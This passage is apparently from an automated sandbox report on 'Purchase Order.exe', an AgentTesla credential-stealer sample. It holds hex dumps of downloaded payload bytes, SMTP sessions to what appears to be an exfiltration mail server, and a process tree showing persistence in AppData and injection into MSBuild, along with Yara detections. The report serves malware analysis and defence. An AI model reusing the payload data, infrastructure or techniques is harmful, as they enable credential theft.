                                                                                  2022-05-02 11:03:16 UTC3474INData Raw: 7e 0a 00 01 9d 7e 03 00 00 07 ec 38 04 13 06 00 19 7b 28 04 00 0a a3 7e 03 11 02 00 00 07 09 38 00 00 02 02 39 01 00 00 d2 75 9a 08 11 04 00 06 26 7b 02 00 00 07 df 38 00 00 07 cf 00 00 00 c2 00 00 08 86 00 00 07 ae 00 00 07 ae 00 00 07 7e 00 00 07 7e 00 00 07 7e 00 00 07 7e 00 00 07 7e 00 00 07 7e 00 00 08 54 00 00 07 7e 00 00 00 0d 45 59 19 06 11 00 00 00 83 38 00 00 09 09 00 00 02 5c 00 00 08 11 00 00 00 05 00 00 01 80 00 00 00 88 00 00 00 06 45 00 15 0c fe 00 00 08 6a 38 03 13 16 00 00 00 00 00 38 01 13 02 00 01 7d 8d 69 8e 04 00 06 26 7b 02 00 00 00 0a 0e 38 6d 7c 42 25 28 05 2b 11 00 01 28 00 00 0a 39 00 06 30 1b 00 00 7a 0a 00 00 15 73 55 5e e8 0f 28 05 2b 36 00 00 00 00 00 00 00 19 00 00 01 4d 00 00 01 26 00 00 00 27 00 00 00 02 00 00 1c 41 00 ff
                                                                                  Data Ascii: ~~8{(~89u&{8~~~~~~T~EY8\Ej88}i&{8m|B%(+(90zsU^(+6M&'A
                                                                                  2022-05-02 11:03:16 UTC3490INData Raw: a7 38 04 00 06 00 7d 0a 00 02 4e 6f a2 00 11 16 25 01 00 00 2f 8d 17 06 00 16 13 28 04 00 09 c9 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 ca 20 03 02 00 00 00 00 38 ff ff ff e2 39 06 00 16 6f 28 04 00 09 e0 7e 00 11 00 00 00 4b 38 04 00 06 00 7d 00 11 02 2a 00 00 00 5a 38 00 00 00 85 3a 06 00 17 4b 28 04 00 0a 17 7e 04 00 00 00 00 38 06 00 08 6a 28 04 02 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 53 3f 7c 88 28 05 2b 11 00 00 f6 00 00 00 c9 00 07 30 13 00 2a 06 00 0c bf 28 00 00 09 fe 00 49 17 5e de 28 05 2b 4a 00 00 2a 04 00 05 ff 7e 2f 45 6d 2d 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 05 ff 7e 5b 60 a8 3b 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 63 08 31 ab 28 05 2b 4a 00 00 ff ff ff 79 38 06 00 16 87 28 04 00 09 e6 7e 0a 00 00 3a 6f 06 00 13 87
                                                                                  Data Ascii: 8}No%/(~#(( 89o(~K8}*Z8:K(~8j(8(:~S?|(+0*(I^(+J*~/Em-(+6*~[`;(+B*(9~c1(+Jy8(~:o
                                                                                  2022-05-02 11:03:16 UTC3506INData Raw: 11 d3 20 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 c9 7b 04 00 08 2c 7e 61 84 48 d8 e4 20 bc c3 07 cd 20 00 00 01 81 38 00 00 01 49 39 02 11 00 00 01 50 38 04 00 05 e7 7d d2 60 18 04 00 05 e7 7b 02 02 00 00 01 d3 38 04 00 05 e7 7d d2 60 17 04 00 05 e7 7b 02 02 00 00 00 b4 38 00 00 02 2a 39 06 00 18 7b 28 04 00 0a 63 7e 02 ff ff ff cc 38 00 00 00 f3 39 08 0e 00 00 01 4a 38 04 00 05 e7 7d d2 60 1a 04 00 05 e7 7b 02 02 00 00 01 0e 38 04 00 05 e7 7d d2 60 1e 04 00 05 e7 7b 02 02 ff ff ff c5 38 04 00 05 eb 7d 05 0e 02 00 00 01 e4 38 00 00 01 bd 3b 15 07 0e ff ff ff 83 38 04 00 05 e7 7d d2 60 10 1f 04 00 05 e7 7b 02 02 00 00 00 43 38 00 00 01 a6 39 06 0e ff ff ff 8e 38 00 00 00 00 20 26 ff ff ff 99 39 04 00 08 0f 7b 04 00 08 2c 7e 00 00 00 01 20 00 00 00 d7 3a
                                                                                  Data Ascii: (&~a{,~aH 8I9P8}`{8}`{8*9{(c~89J8}`{8}`{8}8;8}`{C898 &9{,~ :
                                                                                  2022-05-02 11:03:16 UTC3522INData Raw: 02 4e 7f ca a8 28 05 2b 62 00 2a 06 00 0c bf 28 00 00 09 fe 00 34 3f 76 69 28 05 2b 4a 00 00 2a 04 00 05 c9 7e 2e 57 87 1f 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 05 c9 7e 5b 13 04 33 28 05 2b 42 ff ff ff c8 38 06 00 0f d3 28 04 00 08 39 7e 2a 00 00 00 00 38 04 00 05 c8 80 0a 00 00 23 28 06 00 0c bf 28 01 00 00 c1 20 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 00 00 00 29 38 68 7f f1 ef 28 05 2b 00 00 00 00 00 00 00 44 00 02 30 03 00 2a 00 00 00 00 38 06 00 17 7f 28 04 00 0a 24 7e 06 00 17 8b 28 04 00 0a 27 7e 02 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 1f 7b 04 00 08 2c 7e 61 57 f5 7b df 20 59 68 ca 99 a4 20 de 95 d3 d1 20 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 ed 20 03 03 3b 60 65 34 28 05 2b 00 00 00 00 00 00 00 63 00 06
                                                                                  Data Ascii: N(+b*(4?vi(+J*~.W(+6*~[3(+B8(9~*8#(( 8(:~)8h(+D0*8($~('~(&~a{,~aW{ Yh w(~#(( ;`e4(+c
                                                                                  2022-05-02 11:03:16 UTC3538INData Raw: 2b 11 00 00 e0 00 00 01 80 00 04 30 13 00 00 2a 00 00 00 00 38 04 00 05 90 7d 16 03 7a 0a 00 01 2b 73 0a 00 01 70 28 0a 00 02 0a 28 00 0f 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e6 7b 04 00 08 2c 7e 61 5f a3 e6 74 20 45 16 fa 74 20 0a 00 02 0a 28 04 00 05 90 7c 03 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 09 7b 04 00 08 2c 7e 61 f9 9f ba 33 20 ee 42 84 60 20 00 00 00 00 38 00 00 00 62 3b 04 00 05 90 7b 03 02 64 49 8d 54 28 05 2b 00 00 00 00 00 00 00 82 00 05 30 03 00 00 ff ff ff c3 38 ff ff ff ee 3d 16 02 ff ff ff 96 38 ff ff ff c7 3a 03 7a 0a 00 01 d3 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 19 7b 04 00 08 2c 7e 61 e4 01 09 a6 20 93 fc 3c 03 20 2a 00 00 00 00 38 04 00 05 90 7d 02 03 7a 0a 00 01 8c 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 fd 7b
                                                                                  Data Ascii: +0*8}z+sp(((&~a{,~a_t Et (|(&~a{,~a3 B` 8b;{dIT(+08=8:zs(&~a{,~a < *8}zs(&~a{
                                                                                  2022-05-02 11:03:16 UTC3554INData Raw: 00 2d 38 00 00 00 43 3a 0a 00 02 0f 28 02 11 ff ff ff e6 38 00 13 04 00 05 77 7b 02 ff ff ff e6 38 ff ff ff d9 3b 17 00 11 00 00 00 46 38 00 00 00 71 40 1b 00 11 00 00 00 38 38 02 13 06 00 15 47 28 04 00 09 96 7e 02 2a 4e e0 01 12 00 00 00 31 38 60 6f e7 36 28 05 2b 11 00 00 d0 00 00 00 a8 00 04 30 13 ff ff fe 5c 38 02 13 04 00 05 77 7b 02 ff ff fe 55 38 06 00 14 d7 28 04 00 09 7a 7e 17 1e 02 ff ff fe 5d 38 ff ff fe 98 3b 1b 02 11 7a 06 00 14 ef 28 04 00 09 80 7e 02 2a 60 62 38 1f 6e 91 01 11 04 00 05 72 7d 58 17 01 11 01 13 04 00 05 72 7b 02 02 04 00 05 6e 7b 02 60 62 30 1f 6e 91 01 11 04 00 05 72 7d 58 17 01 11 01 13 04 00 05 72 7b 02 02 04 00 05 6e 7b 02 60 62 28 1f 6e 91 01 11 04 00 05 72 7d 58 17 01 11 01 13 04 00 05 72 7b 02 02 04 00 05 6e 7b 02 60
                                                                                  Data Ascii: -8C:(8w{8;F8q@88G(~*N18`o6(+0\8w{U8(z~]8;z(~*`b8nr}Xr{n{`b0nr}Xr{n{`b(nr}Xr{n{`
                                                                                  2022-05-02 11:03:16 UTC3570INData Raw: 86 38 58 2f 33 82 28 05 2b 11 00 00 b6 00 00 00 d3 00 03 30 13 00 2a 0a 00 01 df 6f 02 49 1a 43 6f 28 05 2b 3a 00 2a 0a 00 01 de 6f 02 5e 7f 70 63 28 05 2b 3a 00 2a 0a 00 01 dd 6f 02 6e 07 65 75 28 05 2b 3a 00 2a 0a 00 01 dc 6f 02 34 53 2e 60 28 05 2b 3a 00 2a 0a 00 01 db 28 02 3e 3e 08 d0 28 05 2b 3a 00 00 00 ff ff ff 5f 38 ff ff ff 67 39 0a 00 01 a0 28 0a 00 00 23 28 06 00 0c bf 28 01 00 00 86 20 02 2a 00 11 ff ff ff 77 38 00 00 00 05 00 00 00 08 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 08 00 00 00 08 00 00 00 05 00 00 00 13 45 00 11 2a 17 2a 68 1f ff ff ff b2 38 ff ff ff ba 39 0a 00 01 a0 28 0a 00 00 23 28 06 00 0c bf
                                                                                  Data Ascii: 8X/3(+0*oICo(+:*o^pc(+:*oneu(+:*o4S.`(+:*(>>(+:_8g9(#(( *w8E**h89(#(
                                                                                  2022-05-02 11:03:16 UTC3586INData Raw: 10 1f 07 11 d2 64 1e 07 11 d2 07 11 68 64 10 1f 08 11 68 08 11 05 11 ff ff ff 1a 38 08 13 6d 64 20 1f 00 11 2a 0a 00 01 9d 7e ff ff fe f0 38 ff ff ff 16 3b 18 02 11 ff ff ff bd 38 06 13 6d 64 20 1f 01 11 ff ff ff 9b 38 06 00 13 bb 28 04 00 09 33 7e 02 03 11 ff ff ff 26 38 ff ff ff 08 38 ff ff ff 0d 38 06 00 13 b3 28 04 00 09 31 7e 02 00 00 00 59 38 07 13 6d 01 11 00 00 00 9c 38 00 13 6a 16 ff ff ff 1e 38 00 00 00 00 20 26 ff ff ff 29 3a 04 00 08 27 7b 04 00 08 2c 7e 00 00 00 00 20 00 00 00 7e 3a 00 11 ff ff ff a2 38 00 13 06 00 13 db 28 04 00 09 3b 7e 02 ff ff ff 56 38 00 00 00 01 20 26 ff ff ff 61 3a 04 00 07 dd 7b 04 00 08 2c 7e 00 00 00 01 20 03 13 06 00 13 a7 28 04 00 09 2e 7e 02 00 00 00 bd 38 00 00 00 c8 3a 01 11 00 00 00 af 38 05 13 6d 00 11 ff ff
                                                                                  Data Ascii: dhdh8md *~8;8md 8(3~&888(1~Y8m8j8 &):'{,~ ~:8(;~V8 &a:{,~ (.~8:8m
                                                                                  2022-05-02 11:03:16 UTC3602INData Raw: 7a 00 00 2a 04 00 03 ca 7e 42 08 2f 0a 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 03 ca 7e 38 70 50 68 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 64 7b f7 6b 28 05 2b 4a 00 ff ff ff f4 38 01 13 00 11 2a 01 11 00 00 00 03 38 06 00 03 e9 28 69 8e 02 00 11 16 02 00 00 00 00 38 00 13 0a 00 00 17 28 69 8e 02 6e 62 40 d2 28 05 2b 11 00 00 39 00 00 00 33 00 05 30 13 2a 02 11 ff ff ff d1 38 01 13 01 fe 16 0a 00 00 c7 28 02 00 00 00 10 38 02 13 06 00 12 83 28 04 00 08 e5 7e 00 11 ff ff ff d2 38 ff ff ff ec 39 01 11 00 00 00 0c 38 00 13 0a 00 01 6b 28 02 7a 0a 00 01 2b 73 06 00 10 0f 28 04 00 08 48 7e fd 36 7d 31 20 00 00 00 41 38 35 74 00 7f 28 05 2b 11 00 00 7e 00 00 00 60 00 03 30 13 00 2a 00 00 00 00 38 0a 00 00 11 28 02 00 00 00 00 38 06 00 0f d7 28 04 00 08
                                                                                  Data Ascii: z*~B/(+6*~8pPh(+B*(9~d{k(+J8*8(i8(inb@(+930*8(8(~898k(z+s(H~6}1 A85t(+~`0*8(8(
                                                                                  2022-05-02 11:03:16 UTC3618INData Raw: 08 be 7e 61 06 00 11 db 28 04 00 08 bb 7e 06 00 11 e3 28 04 00 08 bd 7e 06 00 11 ef 28 04 00 08 c0 7e 06 00 11 c7 28 04 00 08 b6 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 88 20 06 00 11 c7 28 04 00 08 b6 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 8b 20 06 00 11 c7 28 04 00 08 b6 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 8d 20 06 00 11 c7 28 04 00 08 b6 7e 0a 00 00 23 28 06 00 0c bf 28 02 00 00 8c 20 65 43 0b ba 28 05 2b 00 00 00 00 00 00 00 95 00 07 30 03 00 2a 00 00 00 00 38 0a 00 00 11 28 02 00 00 00 00 38 06 00 0f d7 28 04 00 08 3a 7e 49 26 ff 26 28 05 2b 8a 00 2a 06 00 0c bf 28 00 00 09 fe 00 63 7f 89 37 28 05 2b 4a 00 00 2a 04 00 03 ab 7e 50 08 ac 00 28 05 2b 36 00 00 00 2a 01 fe 14 04 00 03 ab 7e 63 3b 55 d0 28 05 2b 42 00 2a 06 00 0f d3 28 04 00 08
                                                                                  Data Ascii: ~a(~(~(~(~#(( (~#(( (~#(( (~#(( eC(+0*8(8(:~I&&(+*(c7(+J*~P(+6*~c;U(+B*(
                                                                                  2022-05-02 11:03:16 UTC3634INData Raw: fd 38 dc 00 00 00 00 38 0a 00 00 77 28 26 11 00 00 00 00 38 00 00 00 11 39 38 11 ff ff f8 1b dd ff ff fe 9b 38 07 13 5f 61 01 11 58 00 11 27 ac 65 4f 20 07 11 ff ff fc a8 38 04 13 0a 00 00 98 73 14 11 ff ff f9 e9 38 ff ff fe 73 38 ff ff f9 ce 38 03 13 61 59 01 11 61 00 11 5e 3c 65 1d 20 03 11 ff ff f8 a3 38 00 00 00 01 20 26 ff ff f8 ae 39 04 00 08 30 7b 04 00 08 2c 7e 00 00 00 04 20 04 00 03 64 80 58 01 11 58 00 11 d7 ad 11 0a 20 ff ff f8 d2 38 00 00 00 01 20 26 ff ff f8 dd 39 04 00 07 cf 7b 04 00 08 2c 7e 00 00 00 00 20 04 00 03 67 80 68 61 68 66 65 65 66 66 65 66 65 66 58 01 11 59 00 11 c8 bb ec d1 20 06 00 11 6b 28 04 00 08 9f 7e 04 00 03 68 7e ff ff fc 64 38 ff ff fc d8 38 ff ff f9 bb 38 ff ff f4 ec dd ff ff f9 30 38 00 00 00 00 20 26 ff ff f9 3b 39
                                                                                  Data Ascii: 88w(&8988_aX'eO 8s8s88aYa^<e 8 &90{,~ dXX 8 &9{,~ ghahfeeffefefXY k(~h~d88808 &;9
                                                                                  2022-05-02 11:03:16 UTC3650INData Raw: 38 ff ff ff 95 3a 04 ff ff ff 9b 38 00 02 0b fe 06 00 00 bf 28 02 ff ff ff b7 38 00 00 00 1f 39 03 00 00 00 25 38 ff ff ff 2f dd 00 00 00 00 38 26 ff ff ff 3a dd 00 00 00 00 38 26 06 00 10 e3 28 04 00 08 7d 7e 1a 14 01 11 00 00 00 00 38 26 06 00 10 e3 28 04 00 08 7d 7e 1a 14 02 11 00 00 00 00 3e 38 0a 00 00 c8 28 04 02 11 00 00 00 65 38 00 00 00 75 3a 0a 00 00 c7 28 02 11 00 ff ff ff 69 38 00 00 00 00 20 26 ff ff ff 74 3a 04 00 08 09 7b 04 00 08 2c 7e 00 00 00 00 20 06 00 00 ce 28 0a 00 00 c6 28 06 00 10 0f 28 04 00 08 48 7e fd 36 68 5a 20 02 11 03 12 00 00 00 3c 38 06 00 10 df 28 04 00 08 7c 7e 03 12 00 00 00 11 38 02 13 06 00 00 c5 28 06 00 10 db 28 04 00 08 7b 7e 02 01 11 ff ff ff dd 38 00 00 01 9f 3a 04 00 02 fb 7b 02 2a 02 11 00 00 01 ad 38 00 00 01
                                                                                  Data Ascii: 8:8(89%8/8&:8&(}~8&(}~>8(e8u:(i8 &t:{,~ (((H~6hZ <8(|~8(({~8:{*8
                                                                                  2022-05-02 11:03:16 UTC3666INData Raw: fd 1f 02 ff ff ff 9b 38 00 00 00 00 20 26 ff ff ff a6 3a 04 00 08 01 7b 04 00 08 2c 7e 00 00 00 00 20 00 00 00 c0 39 5f 19 02 11 00 00 01 33 38 04 00 00 17 7d 0a 00 00 13 6f 04 00 00 06 7d 05 11 25 06 00 00 06 73 fe 1f 05 13 04 00 00 14 7b 02 02 00 00 01 b5 38 00 00 00 a6 00 00 01 d3 00 00 01 ba 00 00 00 03 45 00 04 0c fe 00 00 01 9a 38 01 13 04 00 00 11 7b 02 00 65 31 eb 02 28 05 2b 11 00 00 06 00 00 02 47 00 05 30 1b 00 00 00 00 11 00 1f 05 00 1a 00 02 00 00 10 01 00 ff ff ff c2 38 00 ff ff ff e5 38 00 13 04 00 00 11 7b 02 ff ff ff c8 38 00 00 00 12 3b fd 1f 00 11 2a 00 00 00 00 38 dc 00 00 00 00 38 06 00 10 03 28 04 00 08 45 7e 02 00 00 00 16 dd 00 00 00 00 38 38 00 00 00 21 40 17 00 11 00 00 00 38 38 5f 53 9d 64 28 05 2b 11 00 00 01 00 00 00 57 00 03
                                                                                  Data Ascii: 8 &:{,~ 9_38}o}%s{8E8{e1(+G088{8;*88(E~88!@88_Sd(+W


                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                  May 2, 2022 13:02:40.382987022 CEST587497715.250.241.50192.168.2.4220 mail.srv04.aysima.net ESMTP Exim 4.95 #2 Mon, 02 May 2022 14:02:38 +0300
                                                                                  May 2, 2022 13:02:40.383440018 CEST49771587192.168.2.45.250.241.50EHLO 048707
                                                                                  May 2, 2022 13:02:40.435312033 CEST587497715.250.241.50192.168.2.4250-srv04.aysima.net Hello 048707 [84.17.52.38]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPE_CONNECT
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  May 2, 2022 13:02:40.435650110 CEST49771587192.168.2.45.250.241.50STARTTLS
                                                                                  May 2, 2022 13:02:40.493628979 CEST587497715.250.241.50192.168.2.4220 TLS go ahead
                                                                                  May 2, 2022 13:03:39.975064039 CEST587497915.250.241.50192.168.2.4220 mail.srv04.aysima.net ESMTP Exim 4.95 #2 Mon, 02 May 2022 14:03:38 +0300
                                                                                  May 2, 2022 13:03:39.975383043 CEST49791587192.168.2.45.250.241.50EHLO 048707
                                                                                  May 2, 2022 13:03:40.026964903 CEST587497915.250.241.50192.168.2.4250-srv04.aysima.net Hello 048707 [84.17.52.38]
                                                                                  250-SIZE 52428800
                                                                                  250-8BITMIME
                                                                                  250-PIPELINING
                                                                                  250-PIPE_CONNECT
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-STARTTLS
                                                                                  250 HELP
                                                                                  May 2, 2022 13:03:40.027529001 CEST49791587192.168.2.45.250.241.50STARTTLS
                                                                                  May 2, 2022 13:03:40.083175898 CEST587497915.250.241.50192.168.2.4220 TLS go ahead

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:13:01:28
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Users\user\Desktop\Purchase Order.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                                                  Imagebase:0x740000
                                                                                  File size:44032 bytes
                                                                                  MD5 hash:D88A146F731E00B42947EC060F3D4F43
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.372147247.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.372147247.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.372093079.0000000003A4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.372093079.0000000003A4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.372017902.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.372017902.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  Target ID:13
                                                                                  Start time:13:02:07
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                                                  Imagebase:0x1190000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:14
                                                                                  Start time:13:02:07
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:15
                                                                                  Start time:13:02:07
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:timeout 20
                                                                                  Imagebase:0x1a0000
                                                                                  File size:26112 bytes
                                                                                  MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:16
                                                                                  Start time:13:02:29
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  Imagebase:0x310000
                                                                                  File size:261728 bytes
                                                                                  MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:17
                                                                                  Start time:13:02:30
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  Imagebase:0xc20000
                                                                                  File size:261728 bytes
                                                                                  MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.504132970.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000002.504132970.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high

                                                                                  Target ID:20
                                                                                  Start time:13:02:40
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe"
                                                                                  Imagebase:0xfa0000
                                                                                  File size:44032 bytes
                                                                                  MD5 hash:D88A146F731E00B42947EC060F3D4F43
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 31%, ReversingLabs
                                                                                  Reputation:low

                                                                                  Target ID:23
                                                                                  Start time:13:02:48
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe"
                                                                                  Imagebase:0x280000
                                                                                  File size:44032 bytes
                                                                                  MD5 hash:D88A146F731E00B42947EC060F3D4F43
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Reputation:low

                                                                                  Target ID:26
                                                                                  Start time:13:03:17
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                                                  Imagebase:0x1190000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:27
                                                                                  Start time:13:03:17
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:29
                                                                                  Start time:13:03:17
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:timeout 20
                                                                                  Imagebase:0x1a0000
                                                                                  File size:26112 bytes
                                                                                  MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:30
                                                                                  Start time:13:03:23
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                                                  Imagebase:0x1190000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:31
                                                                                  Start time:13:03:23
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:32
                                                                                  Start time:13:03:24
                                                                                  Start date:02/05/2022
                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:timeout 20
                                                                                  Imagebase:0x1a0000
                                                                                  File size:26112 bytes
                                                                                  MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  No disassembly